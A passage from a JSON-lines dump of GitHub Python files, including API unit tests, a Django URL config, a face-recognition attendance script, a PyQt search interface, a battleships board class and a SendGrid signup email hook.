patch\n\n@pytest.fixture\n@patch(\"mercado_bitcoin.apis.ApiMercadoBitcoin.__abstractmethods__\", set())\ndef fixture_api_mercado_bitcoin():\n return ApiMercadoBitcoin(coin = 'ND')\n\ndef mocked_requests_get(*args, **kwargs):\n class MockResponse(requests.Response):\n def __init__(self, status_code, json_data):\n super().__init__()\n self.status_code = status_code\n self.json_data = json_data\n\n def json(self):\n return self.json_data\n\n def raise_for_status(self):\n if self.status_code != 200:\n raise Exception\n\n if args[0] == 'Response success.':\n return MockResponse(status_code = 200, json_data = {\"foo\": \"bar\"})\n else:\n return MockResponse(status_code = 404, json_data = None)\n\nclass TestApiMercadoBitcoin:\n @patch(\"requests.get\")\n @patch(\"mercado_bitcoin.apis.ApiMercadoBitcoin._get_endpoint\", return_value = 'Request done.')\n def test_get_data_request(self, mock_get_endpoint, mock_requests, fixture_api_mercado_bitcoin):\n fixture_api_mercado_bitcoin.get_data()\n\n mock_requests.assert_called_once_with('Request done.')\n\n @patch(\"requests.get\", side_effect = mocked_requests_get)\n @patch(\"mercado_bitcoin.apis.ApiMercadoBitcoin._get_endpoint\", return_value = 'Response success.')\n def test_get_data_response_success(self, mock_get_endpoint, mock_requests, fixture_api_mercado_bitcoin):\n actual = fixture_api_mercado_bitcoin.get_data()\n expected = {\"foo\": \"bar\"}\n\n assert actual == expected\n\n @patch(\"requests.get\", side_effect = mocked_requests_get)\n @patch(\"mercado_bitcoin.apis.ApiMercadoBitcoin._get_endpoint\", return_value = 'Response failure.')\n def test_get_data_response_failure(self, mock_get_endpoint, mock_requests, fixture_api_mercado_bitcoin):\n with pytest.raises(Exception):\n fixture_api_mercado_bitcoin.get_data()\n\nclass TestApiDaySummary:\n @pytest.mark.parametrize(\n \"coin, date, expected\",\n [\n ('BTC', datetime.date(2021, 6, 15), 'https://www.mercadobitcoin.net/api/BTC/day-summary/2021/6/15'),\n ('ETH', datetime.date(2021, 6, 15), 'https://www.mercadobitcoin.net/api/ETH/day-summary/2021/6/15'),\n ('ETH', datetime.date(2021, 6, 30), 'https://www.mercadobitcoin.net/api/ETH/day-summary/2021/6/30')\n ]\n )\n def test_get_endpoint(self, coin, date, expected):\n api = ApiDaySummary(coin = coin)\n actual = api._get_endpoint(date = date)\n \n assert actual == expected\n\nclass TestApiTrades:\n @pytest.mark.parametrize(\n \"day, expected\",\n [\n (datetime.datetime(2021, 1, 25), 1611543600),\n (datetime.datetime(2012, 12, 16), 1355623200),\n (datetime.datetime(2012, 12, 16, 0, 0, 5), 1355623205)\n ]\n )\n def test_get_date_unix(self, day, expected):\n actual = ApiTrades(coin = 'ND')._get_date_unix(day)\n assert actual == expected\n\n @pytest.mark.parametrize(\n \"coin, day, expected\",\n [\n ('ND', datetime.datetime(2021, 1, 25), 'https://www.mercadobitcoin.net/api/ND/trades/1611543600'),\n ('ND', datetime.datetime(2012, 12, 16), 'https://www.mercadobitcoin.net/api/ND/trades/1355623200'),\n ('ND', datetime.datetime(2012, 12, 16, 0, 0, 5), 'https://www.mercadobitcoin.net/api/ND/trades/1355623205')\n ]\n )\n def test_get_endpoint(self, coin, day, expected):\n actual = ApiTrades(coin = coin)._get_endpoint(day = day)\n assert actual == expected\n\n def test_get_endpoint_current_day(self):\n with pytest.raises(RuntimeError):\n ApiTrades(coin = 'ND')._get_endpoint(day = datetime.datetime.today().strftime('%Y-%m-%d'))\n\n","repo_name":"cfascina/hb-data-engineering","sub_path":"exercises/04-data-ingestion/tests/test_apis.py","file_name":"test_apis.py","file_ext":"py","file_size_in_byte":3944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"12647648598","text":"from bs4 import BeautifulSoup\r\nimport requests\r\n\r\nresponse = requests.get(\r\n \"https://web.archive.org/web/20200518073855/https://www.empireonline.com/movies/features/best-movies-2/\")\r\nweb_page = response.text\r\n\r\nsoup = BeautifulSoup(web_page, \"html.parser\")\r\nall_movies = soup.find_all(name='h3', class_='title')\r\nall_movies_name = [movie.text for movie in all_movies]\r\nall_movies_name.reverse()\r\n\r\nwith open('movies.txt', 'w', encoding='UTF-8') as file:\r\n for movie in all_movies_name:\r\n file.write(f\"{movie} \\n\")\r\n","repo_name":"vanshparate/100-days-of-code","sub_path":"day-45(Scrape)/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"11469899347","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='home'),\n path('specifications/', views.specs, name='specs'),\n path('bleed/', views.bleed, name='bleed'),\n path('file_type/', views.file_type, name='file_type'),\n path('deep_black/', views.deep_black, name='deep_black'),\n path('ink_coverage/', views.ink_coverage, name='ink_coverage'),\n path('job_options/', views.job_options, name='job_options'),\n path('color/', views.color, name='color'),\n path('outlines/', views.outlines, name='outlines'),\n path('foil/', views.foil, name='foil'),\n path('overprint/', views.overprint, name='overprint'),\n path('resolution/', views.resolution, name='resolution'),\n path('templates/', views.templates, name='templates'),\n path('faq/', views.faq, name='faq'),\n path('team/', views.team, name='team'),\n path('printing_house/', views.printing_house, name='printing_house'),\n path('our_concept/', views.our_concept, name='our_concept'),\n]\n","repo_name":"Daph1986/postfly_jouw_online_drukkerij","sub_path":"home/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"7931131889","text":"import cv2\nimport face_recognition as fr\nimport os\nimport numpy\nfrom datetime import datetime\n\n#crear base de datos\nruta = 'Dia_14/Empleados'\nmis_imagenes =[]\nnombres_empleados =[]\nlista_empleados = os.listdir(ruta)\n#elimiar primer registro de una lista\ndel (lista_empleados[0])\n\n\n\n\n#print(lista_empleados)\n\nfor nombre in lista_empleados:\n imagen_actual = cv2.imread(f'{ruta}/{nombre}')\n mis_imagenes.append(imagen_actual)\n nombres_empleados.append(os.path.splitext(nombre)[0])\n\nprint(nombres_empleados)\n\n#codificar imagenes\ndef codificar(imagenes):\n #crear una lista neuva\n lista_codificada=[]\n\n #pasar las imagenes a RGB\n for imagen in imagenes:\n imagen = cv2.cvtColor(imagen, cv2.COLOR_BGR2RGB)\n\n #codificar\n codificado = fr.face_encodings(imagen)[0]\n\n #agregar a la lista\n lista_codificada.append(codificado)\n\n #devollver lista codificada\n return lista_codificada\n\n#registrar los ingresos\ndef registrar_los_ingresos(persona):\n f= open('Dia_14/registro.csv','r+')\n lista_datos =f.readline()\n nombre_registros = []\n for linea in lista_datos:\n ingreso= linea.split(',')\n nombre_registros.append(ingreso[0])\n if persona not in nombre_registros:\n ahora = datetime.now()\n #trasndorma el dato en un string\n string_ahora= ahora.strftime('%H:%M%S')\n f.writelines(f'\\n {persona}, {string_ahora}')\n\nlista_empleados_codificada= codificar(mis_imagenes)\n#print(len(lista_empleados_codificada))\n\n#tomar una imagen de camara web\ncaptura = cv2.VideoCapture(0,cv2.CAP_DSHOW)\n\n\n\n\n\n\n#leer imagen de la camara\nexito, imagen = captura.read()\n\nif not exito:\n print(\"no se pudo tomar la captura\")\nelse:\n #rreconocer cara en caaptura\n cara_captura = fr.face_locations(imagen)\n #codificar cara capturada\n cara_captura_codificada= fr.face_encodings(imagen, cara_captura)\n\n #buscar coincidencias\n for caracodif, caraubic in zip(cara_captura_codificada, cara_captura):\n coincidencia = fr.compare_faces(lista_empleados,caracodif)\n distancias = fr.face_distance(lista_empleados_codificada,caracodif)\n\n indice_coincidencia= numpy.argmin(distancias)\n\n #mostrar coincidencia\n if distancias[indice_coincidencia]> 0.6:\n print(\"no coincide con ninguno de nuestros empleados\")\n\n else:\n #buscar el nombre del empleado encontrado\n nombre = nombres_empleados[indice_coincidencia]\n\n y1,x2,y2,x1 = caraubic\n cv2.rectangle(imagen, (x1, y1),(x2, y2),(0,255,0),2)\n cv2.rectangle(imagen, (x1, y2 -35), (x2,y2),(0,255,0),cv2.FILLED)\n cv2.putText(imagen, nombre, (x1+ 6, y2 -6),cv2.FONT_HERSHEY_COMPLEX,1,(255,255,255),2)\n\n registrar_los_ingresos(nombre)\n\n #mostrar la imagen btenida\n cv2.imshow('imagen web', imagen)\n\n #mantener ventana abierta\n cv2.waitKey(0)\n\n\n\n","repo_name":"sgarciaar/Python-Cero-a-Experto","sub_path":"Dia_14/asistencia.py","file_name":"asistencia.py","file_ext":"py","file_size_in_byte":2934,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"40526227634","text":"# -*- coding: utf-8 -*-\n\n__author__ = 'Johan Stabekk, Sabina Langås'\n__email__ = 'johansta@nmbu.no, sabinal@nmbu.no'\n\n\"\"\"This is a small script that test if the move_maker function in BioSim simulation works\"\"\"\n\nfrom biosim.simulation import BioSim\n\nDEFAULT_IMAGE_BASE = r'/Users/sabinal/Documents/INF200 JUNI/Bilder og videoer/bio'\n\nsim = BioSim(ymax_animals=2000,\n cmax_animals={'Herbivore': 150, 'Carnivore': 80},\n img_base=DEFAULT_IMAGE_BASE)\nsim.simulate(25, 1, 1)\nsim.make_movie()","repo_name":"Johanstab/BioSim_G13_Johan_Sabina","sub_path":"examples/video_demo.py","file_name":"video_demo.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"13941336927","text":"def uniquePaths(m, n):\n ans = 1\n if m > n:\n # 一共要向右走m-1步,向下走n-1步,共m+n-2步\n # 共有多少走的方法,看作是在m+n-2步中选择n-1步\n for i in range(n-1):\n ans *= m+i\n ans /= n-1-i\n return round(ans, 0)\n else:\n for i in range(m-1):\n ans *= n+i\n ans /= m-1-i\n return round(ans)\n\n\nprint(uniquePaths(10, 10))","repo_name":"pda37/HelloPython","sub_path":"basic_python/practice/uniquePaths.py","file_name":"uniquePaths.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37954057709","text":"#!/usr/bin/python3\n\nfrom enum import Enum\nimport os\nimport re\nimport xml\n\n\nSRC_DIR = \"./src\"\nDIST_DIR = \"./dist\"\n\nTEMPLATE_DIR = os.path.join(SRC_DIR, \"templates\")\n\n\nclass TemplateType:\n PLAINTEXT = 0\n HTML = 1\n\n\ndef main():\n if not os.path.exists(DIST_DIR):\n os.mkdir(DIST_DIR)\n if not os.path.exists(f\"{DIST_DIR}/templates\"):\n os.mkdir(f\"{DIST_DIR}/templates\")\n menus, scripts = collect_templates()\n with open(os.path.join(DIST_DIR, \"Template.js\"), \"w\") as file:\n file.write(compile_template_scripts(scripts))\n with open(os.path.join(DIST_DIR, \"scripts.xml\"), \"w\") as file:\n document = render_scripts(scripts)\n file.write(document)\n for menu in menus:\n with open(os.path.join(DIST_DIR, \"templates\", menu[\"title\"] + \".xml\"), \"w\") as file:\n document = render_templates(menu)\n file.write(document)\n\n\ndef collect_common_scripts():\n scripts = []\n return \"\\n\\n\".join(scripts)\n\n\ndef compile_template_scripts(template_scripts):\n script = \"\"\n with open(os.path.join(SRC_DIR, \"template.js\"), \"r\") as file:\n script += file.read()\n script += \"const templates = {}\\n\\n\"\n for template_script in template_scripts:\n script += \"templates.\" + \\\n template_script[\"name\"] + \\\n \" = () => {\\n\" + template_script[\"body\"] + \"\\n};\\n\\n\"\n script += \"return renderTemplate();\"\n return script\n\n\ndef collect_templates():\n menus = []\n scripts = []\n for menu_title in os.listdir(TEMPLATE_DIR):\n texts = []\n dirpath = os.path.join(TEMPLATE_DIR, menu_title)\n for filename in os.listdir(dirpath):\n filepath = os.path.join(dirpath, filename)\n script_name = snakecase(menu_title) + \"__\" + filename.split(\".\")[0]\n text_name, script_body = parse_template(filepath)\n texts.append({\n \"name\": text_name,\n \"body\": \"[[SCRIPT=Template|{}]]\".format(script_name),\n })\n scripts.append({\n \"name\": script_name,\n \"body\": script_body,\n })\n menus.append({\n \"title\": menu_title,\n \"texts\": texts,\n })\n return menus, scripts\n\n\ndef render_scripts(scripts):\n document = '\\n'\n document += '\\n'\n document += 'scripts\\n'\n template_script = compile_template_scripts(scripts)\n document += '\\n'\n document += '\\n'\n return document\n\n\ndef render_templates(menu):\n document = '\\n'\n document += '\\n'\n document += 'templates\\n'\n document += '\\n'\n document += '<![CDATA[{title}]]>\\n'.format(\n title=menu[\"title\"])\n document += '\\n'\n for text in menu[\"texts\"]:\n document += '\\n'.format(\n template_type=TemplateType.HTML)\n document += '\\n'.format(\n name=text[\"name\"])\n document += '\\n'.format(\n body=text[\"body\"])\n document += '\\n'\n document += '\\n'\n document += '\\n'\n document += '\\n'\n return document\n\n\ndef parse_template(filepath):\n frontmatter = {}\n with open(filepath, \"r\") as file:\n lines = file.readlines()\n for line in lines:\n matches = re.match(\"^[ ]*\\*{1}[ ]*([a-z]*):[ ]*(.*)\", line)\n if matches:\n key = matches[1]\n value = matches[2].strip()\n frontmatter[key] = value\n elif re.match(\"^[ ]*\\*/[ ]*$\", line) is not None:\n break\n text_name = frontmatter[\"name\"]\n with open(filepath, \"r\") as file:\n script_body = file.read()\n return text_name, script_body\n\n\ndef remove_whitespace(script):\n \"\"\"Rmeove all whitespace and newlines.\"\"\"\n for i in range(10):\n script = script.replace(\" \", \" \")\n script = re.sub(\"\\n\", \"\", script)\n script = re.sub(\"\\r\", \"\", script)\n return script\n\n\ndef snakecase(value):\n return value.lower().replace(\" \", \"_\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"allbizsupplies/thunderbird-quicktext-templates","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":4384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"30778907651","text":"a = int(input())\ns = list(input())\nlist1 = [0,0]\n\n#for i in s :\n#\tif i == 'a': \n#\t\tlist1[0] += 1\n#\telif i == 'b':\n#\t\tlist1[1] += 1 \n#n1 = list1[0]\n#n2 = list1[1]\n#count = 0 \n#print(n1,n2)\n#while(n1 != n2):\n#\tcount = count + 1\n#\tif(n1 > n2 ):\n#\t\tn1 -= 1 \n#\t\tn2 += 1\n#\telse:\n#\t\tn1 += 1\n#\t\tn2 -= 1\n#print(count)\ncount = 0 \nfor i in range(1,len(s), 2):\n if(s[i-1] == 'a' and s[i] == 'a'):\n count = count + 1 \n s[i-1] = 'b' \n elif(s[i-1] == 'b' and s[i] == 'b') : \n count = count + 1\n s[i-1] = 'a' \n else :\n continue\np = \"\"\nprint(count)\nfor i in s :\n p = p + i \nprint(p)","repo_name":"sankalp1999/Competitive-Programming","sub_path":"CP/Codeforces/Main_Before_July_2020/1216A.py","file_name":"1216A.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"19"} +{"seq_id":"71373840362","text":"import re\nimport time\nfrom logging import getLogger\n\n# pylint: disable=invalid-name\nlogger = getLogger(__name__)\n\n\nclass Helper(object): # pylint: disable=useless-object-inheritance\n # pylint: disable=too-few-public-methods\n \"\"\"Helper functions\"\"\"\n\n @staticmethod\n def decode_search(query):\n # Not possible to do it clearly with simplification...\n # pylint: disable=too-many-nested-blocks, too-many-locals\n \"\"\"Decode a search string:\n\n Convert string from:\n isnot:0 isnot:ack isnot:\"downtime fred\" name:\"vm fred\"\n to a backend search query expression.\n\n Search string is documented in the `modal_search_help.tpl` file\n\n :param query: search string\n :param data_model: table data model as built by the DataTable class\n\n :return: query to be provided to the data manager search objects function\n \"\"\"\n logger.debug(\"decode_search, search string: %s\", query)\n\n # Search patterns like: isnot:0 isnot:ack isnot:\"downtime test\" name \"vm test\"\n regex = re.compile(\n r\"\"\"\n # 1/ Search a key:value pattern.\n (?P\\w+): # Key consists of only a word followed by a colon\n (?P[\"']?) # Optional quote character.\n (?P.*?) # Value is a non greedy match\n (?P=quote2) # Closing quote equals the first.\n ($|\\s) # Entry ends with whitespace or end of string\n | # OR\n # 2/ Search a single string quoted or not\n (?P[\"']?) # Optional quote character.\n (?P.*?) # Name is a non greedy match\n (?P=quote) # Closing quote equals the opening one.\n ($|\\s) # Entry ends with whitespace or end of string\n \"\"\",\n re.VERBOSE\n )\n\n qualifiers = {}\n for match in regex.finditer(query):\n if match.group('name'):\n if 'host_name' not in qualifiers:\n qualifiers['host_name'] = []\n qualifiers['host_name'].append(match.group('name'))\n elif match.group('key'):\n field = match.group('key')\n if field not in qualifiers:\n qualifiers[field] = []\n qualifiers[field].append(match.group('value'))\n logger.debug(\"decode_search, search patterns: %s\", qualifiers)\n\n data_model = {\n 'host_name': {\n 'title': 'Host name'\n },\n 'service_name': {\n 'title': 'Service name'\n },\n 'user_name': {\n 'title': 'User name'\n },\n 'type': {\n 'title': 'Event type',\n 'allowed': 'webui.comment,check.result,check.request,check.requested,'\n 'ack.add,ack.processed,ack.delete,'\n 'downtime.add,downtime.processed,downtime.delete,'\n 'monitoring.timeperiod_transition,'\n 'monitoring.alert,monitoring.event_handler,'\n 'monitoring.flapping_start,monitoring.flapping_stop,'\n 'monitoring.downtime_start,monitoring.downtime_cancelled,'\n 'monitoring.downtime_end,'\n 'monitoring.acknowledge,'\n 'monitoring.notification'\n },\n 'message': {\n 'title': 'Event message'\n }\n }\n\n parameters = {}\n try:\n for field in qualifiers:\n field = field.lower()\n patterns = qualifiers[field]\n logger.info(\"decode_search, searching for '%s' '%s'\", field, patterns)\n\n # Get the column definition for the searched field\n if field not in data_model:\n logger.warning(\"decode_search, unknown column '%s' in table fields\", field)\n continue\n\n c_def = data_model[field]\n logger.debug(\"decode_search, found column: %s\", c_def)\n\n regex = c_def.get('regex', True)\n\n for pattern in patterns:\n logger.info(\"decode_search, pattern: %s\", pattern)\n not_value = pattern.startswith('!')\n if not_value:\n pattern = pattern[1:]\n\n if field in parameters:\n # We already have a field search pattern, let's build a list...\n if not isinstance(parameters[field]['pattern'], list):\n if regex:\n parameters[field]['type'] = \"$or\"\n else:\n parameters[field]['type'] = \"$in\"\n parameters[field]['pattern'] = [parameters[field]['pattern']]\n\n if not_value:\n parameters[field]['pattern'].append(\n {\"$regex\": \"/^((?!%s).)*$/\" % pattern})\n else:\n parameters[field]['pattern'].append(\n {\"$regex\": \".*%s.*\" % pattern})\n continue\n\n if not_value:\n parameters.update(\n {field: {'type': 'simple',\n 'pattern': {\"$regex\": \"/^((?!%s).)*$/\" % pattern}}})\n else:\n parameters.update(\n {field: {'type': 'simple',\n 'pattern': {\"$regex\": \".*%s.*\" % pattern}}})\n\n logger.info(\"decode_search, - parameters: %s\", parameters)\n except Exception as exp:\n logger.exception(\"Exception: %s\", exp)\n\n query = {}\n for field, search_type in parameters.items():\n logger.debug(\"decode_search, build query: %s - %s\", field, search_type)\n if search_type['type'] == 'simple':\n query.update({field: search_type['pattern']})\n elif search_type['type'] == '$or':\n logger.debug(\"decode_search, - $or query: %s\", search_type['pattern'])\n patterns = []\n for pattern in search_type['pattern']:\n patterns.append({field: pattern})\n query.update({'$or': patterns})\n elif search_type['type'] == '$in':\n logger.debug(\"decode_search, - $in query: %s\", search_type['pattern'])\n included = []\n excluded = []\n for pattern in search_type['pattern']:\n if isinstance(pattern, dict):\n if '$ne' in pattern:\n excluded.append(pattern['$ne'])\n else:\n included.append(pattern)\n if included and excluded:\n query.update({field: {'$in': included, '$nin': excluded}})\n else:\n if included:\n query.update({field: {'$in': included}})\n if excluded:\n query.update({field: {'$nin': excluded}})\n elif search_type['type'] == '$ne':\n logger.debug(\"decode_search, - $ne query: %s\", search_type['pattern'])\n query.update({field: {'$ne': search_type['pattern']}})\n\n logger.debug(\"decode_search, result query: %s\", query)\n return query\n","repo_name":"Alignak-monitoring-contrib/alignak-module-ws","sub_path":"alignak_module_ws/utils/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":7738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70600716524","text":"import sys\n\nfrom PyQt5.QtWidgets import (\n QApplication, QDialog, QMainWindow, QMessageBox\n)\nfrom PyQt5.uic import loadUi\n\nfrom ui.main_interface import Ui_MainWindow\n\nfrom src.pkl import load_results\nfrom src.read_file import read_requests\nfrom src.requests import Request\nfrom src.evaluations import evaluate_vectorial_function\n\nfrom src.tfidf import execute_tfidf\nfrom src.boolean_model import boolean_model\nfrom src.vectorial_model import vectorial_model, LIST_MEASURES_FUNCTIONS\n\n\nTRANSLATION_MEASURES_FUNCTIONS = {\n\t'Produit Interne' : 'internal product',\n\t'Coeficient de Dice' : 'dice coeficient',\n\t'Mesure de Cosinus' : 'cosinus measure',\n\t'Mesure de Jaccard' : 'jaccard measure',\n}\n\nclass Window(QMainWindow, Ui_MainWindow):\n\tdef __init__(self, parent=None):\n\t\tsuper().__init__(parent)\n\t\tself.setupUi(self)\n\n\t\tself.setWindowTitle('Projet RI')\n\n\t\tself.setup_values()\n\t\tself.setup_conections()\n\n\tdef setup_values(self):\n\t\tread_requests()\n\t\ttry:\n\t\t\tself.inverse_weight_matrix, self.inverse_structure = load_results()\n\t\texcept FileNotFoundError as e:\n\t\t\tself.inverse_weight_matrix, self.inverse_structure = execute_tfidf()\n\n\t\tself.QueryText.setPlainText(Request.REQUESTS[0].content)\n\n\tdef setup_conections(self):\n\t\tself.SearchInput.clicked.connect(self.search_by_input)\n\t\tself.SearchQueryText.clicked.connect(self.search_by_query)\n\t\tself.QueryNumber.valueChanged.connect(self.update_predifined_query)\n\n\tdef search_by_query(self):\n\t\tif self.ModelChoice.currentText() == 'Le Model Boolean':\n\t\t\tQMessageBox.about(self, \"Model Error\",\n\t\t\t\"This function isn't available for this model, please select the vectorial model in order to continue\")\n\t\telse:\n\t\t\t# call the vectoriel model\n\t\t\tquery_number = self.QueryNumber.value()\n\t\t\tthreshold = self.Threshold.value()\n\t\t\tchoice = self.MeasureChoice.currentText()\n\t\t\tprecision, recall, fmeasure, selected_documents = evaluate_vectorial_function(\n\t\t\t\tself.inverse_weight_matrix, TRANSLATION_MEASURES_FUNCTIONS[choice],\n\t\t\t\t\t\t\tRequest.REQUESTS[query_number-1], threshold)\n\n\t\t\tif not self.is_selection_empty(selected_documents):\n\t\t\t\t# show the content inside the list\n\t\t\t\tself.update_list(selected_documents)\n\n\t\t\tself.Precision.setText(str(\"%.5f\" % precision))\n\t\t\tself.Recall.setText(str(\"%.5f\" % recall))\n\t\t\tself.FMeasure.setText(str(\"%.5f\" % fmeasure))\n\n\tdef search_by_input(self):\n\t\tquery = self.QueryInput.toPlainText()\n\t\tif query == \"\":\n\t\t\tQMessageBox.about(self, \"the query must not be empty\",\n\t\t\t\"please write your query before clicking the search button\")\n\t\t\treturn\n\n\t\tif self.ModelChoice.currentText() == 'Le Model Boolean':\n\t\t\t# call the boolean model\n\t\t\tselected_documents = boolean_model(query)\n\t\telse:\n\t\t\t# call the vectoriel model\n\t\t\tthreshold = self.Threshold.value()\n\t\t\tchoice = self.MeasureChoice.currentText()\n\t\t\tselected_documents = vectorial_model(query, self.inverse_weight_matrix,\n\t\t\t\tmeasure_function=LIST_MEASURES_FUNCTIONS[TRANSLATION_MEASURES_FUNCTIONS[choice]],\n\t\t\t\t\t\t\t\t\t\tthreshold=threshold)\n\n\n\t\tif not self.is_selection_empty(selected_documents):\n\t\t\t# show the content inside the list\n\t\t\tself.update_list(selected_documents)\n\n\tdef is_selection_empty(self, selected_documents):\n\t\tif len(selected_documents) == 0:\n\t\t\tQMessageBox.about(self, \"no document found\",\n\t\t\t\"No document has been found with this query and parameters\")\n\t\t\tself.Result.clear()\n\t\t\treturn True\n\t\treturn False\n\n\tdef update_list(self, selected_documents):\n\t\t# clear the list\n\t\tself.Result.clear()\n\t\t# add items\n\t\tfor document in selected_documents:\n\t\t\tself.Result.addItem(document.id)\n\n\tdef update_predifined_query(self, value):\n\t\tself.QueryText.setPlainText(Request.REQUESTS[value-1].content)\n\ndef launch_ui():\n\tapp = QApplication(sys.argv)\n\twindow = Window()\n\twindow.show()\n\tsys.exit(app.exec_())\n\nif __name__ == \"__main__\":\n\tlaunch_ui()\n","repo_name":"aymenkhs/information-retrieval-on-cacm-collection","sub_path":"ui/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":3778,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"12032539825","text":"import pandas as pd\nimport numpy as np\nimport xlwt\n\ndef coding(patientId, visitId):\n theId = patientId.__str__() + \"&\" + visitId.__str__()\n return theId\n\ndef decoding(theId):\n patientId =''\n visitId =''\n flag = 0\n for i in theId:\n if i=='&':\n flag=1\n continue\n if flag == 0:\n patientId = patientId+i\n else:\n visitId = visitId + i\n return patientId,visitId\n\ndef main():\n data = pd.read_csv('f:/r7.csv')\n print(len(data))\n c = len(data)\n\n for i in data.columns:\n num = 0\n for j in range(len(data)):\n if data[i][j] == 'None':\n num = num + 1\n\n if num > c *0.3:\n data = data.drop(i,axis=1)\n\n print(data)\n data = data.set_index(['patient_id', 'visit_id'])\n r = len(data.values[0])\n for i in data.index:\n num = 0\n\n for j in range(r):\n if data.loc[i][j] == 'None':\n num = num + 1\n\n if num > r *0.3:\n data = data.drop(i)\n print(data)\n data.to_csv('f:/selected.csv')\n\n\n\nif __name__ == '__main__':\n main()","repo_name":"chenjinbiao/AcsPatientDatasetConstruction","sub_path":"select1.py","file_name":"select1.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"31528785580","text":"from battleships.objects.Board import Board\n\n# Import the engine.\nimport engine\n\n\nclass ShipBoard(Board):\n \"\"\"\n Board object that renders all the ships from the player.\n \"\"\"\n\n def __init__(self, parent):\n \"\"\"\n Class constructor.\n Creates a new board on the screen.\n :param parent: The parent of the board.\n \"\"\"\n # Call the parent constructor.\n super().__init__(parent)\n\n # Create the board background.\n ShipBoard.create_background(self, (0, 64, 128), (255, 255, 255))\n\n # List of all the placed ships.\n self.placed_ships = []\n\n def remove_boat(self, boat):\n if boat in self.placed_ships:\n self.placed_ships.remove(boat)\n\n def place_boat(self, boat):\n self.placed_ships.append(boat)\n\n def all_boats_placed(self):\n return len(self.placed_ships) == 5\n\n def position_is_valid(self, cell, length, direction):\n \"\"\"\n Checks if the position is valid for the specified ship.\n :param cell: The cell that is requested.\n :param length: The length of the ship to place.\n :param direction: The direction of the ship.\n :return: True if the position is valid.\n \"\"\"\n # Check if the position is within the bounds.\n if cell.x >= 0 and cell.y >= 0:\n if cell.x <= 10 and cell.y <= 10:\n # If the ship is in the bounds.\n if direction % 2 == 0:\n if cell.x <= 10 - length:\n # Check for collisions\n return self.collision_check(cell, length, direction) is None\n else:\n if cell.y <= 10 - length:\n # Check for collisions\n return self.collision_check(cell, length, direction) is None\n\n @staticmethod\n def __get_covered_cells(cell, length, direction):\n covered_cells = []\n for i in range(length):\n if direction % 2 == 0:\n covered_cells.append(i + (cell.x + cell.y * 10))\n else:\n covered_cells.append((i * 10) + (cell.x + cell.y * 10))\n\n return covered_cells\n\n def collision_check(self, cell, length, direction):\n # Compute all the cells covered by the ship/shot.\n covered_cells = ShipBoard.__get_covered_cells(cell, length, direction)\n\n # Loop through all the ships.\n for ship in self.placed_ships:\n ship_cells = ShipBoard.__get_covered_cells(ship.get_cell(), ship.length, ship.rotation)\n intersect = list(set(covered_cells) & set(ship_cells))\n if len(intersect) > 0:\n return ship\n\n return None\n\n","repo_name":"yShimoka/Python-Bataille-Navale","sub_path":"battleships/objects/ShipBoard.py","file_name":"ShipBoard.py","file_ext":"py","file_size_in_byte":2712,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"28237323190","text":"# -*- coding: utf-8 -*-\n# Third-party app imports\nimport sendgrid\n\n# Imports from app\nfrom .models import Company, UserProfile\nfrom context.settings.secrets import SENDGRID_API_KEY\n\n# Initializing SendGrid: created in order to send emails with SendGrid\n# templates\nsg = sendgrid.SendGridClient(SENDGRID_API_KEY)\n\n\ndef check_company_auth(strategy, details, user=None, *args, **kwargs):\n try:\n user_profile = UserProfile.objects.get(user=user)\n except UserProfile.DoesNotExist:\n user_profile = None\n\n # Find or create company domain\n split_email = details['email'].split('@')\n company_name = split_email[1].split('.')[0]\n company_profile, created = Company.objects.get_or_create(\n name=company_name,\n email_extension=split_email[1],\n )\n\n if not user_profile and details['email']:\n user_profile, created = UserProfile.objects.get_or_create(\n user=user,\n company=company_profile,\n )\n else:\n user_profile.company = company_profile\n user_profile.save()\n\n\ndef send_welcome_email(strategy, details, user=None, is_new=False, *args, **kwargs):\n if is_new:\n full_name = ' '.join((details['first_name'], details['last_name']))\n email = details['email']\n\n message = sendgrid.Mail()\n message.set_from('NewsAI ')\n message.set_subject('Welcome to NewsAI!')\n message.set_text('Welcome to NewsAI!')\n\n if full_name and email:\n message.add_to(full_name + ' <' + email + '>')\n message.add_substitution('-fullname-', full_name)\n message.add_filter('templates', 'template_id',\n '39e92d35-09a0-43a5-9629-03fcefecdc2b')\n status, msg = sg.send(message)\n","repo_name":"news-ai/context","sub_path":"app/context/apps/users/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"43144853865","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 9 15:20:11 2018\n\n@author: shahrear\nstudent.eco86@gmail.com\n©Md. Shahrear Zaman\nreference books:\n1.Economic Dynamics\n4th Edition\n2010\nby \nGiancarlo Gandolfo\npage-379\n\n2.User's 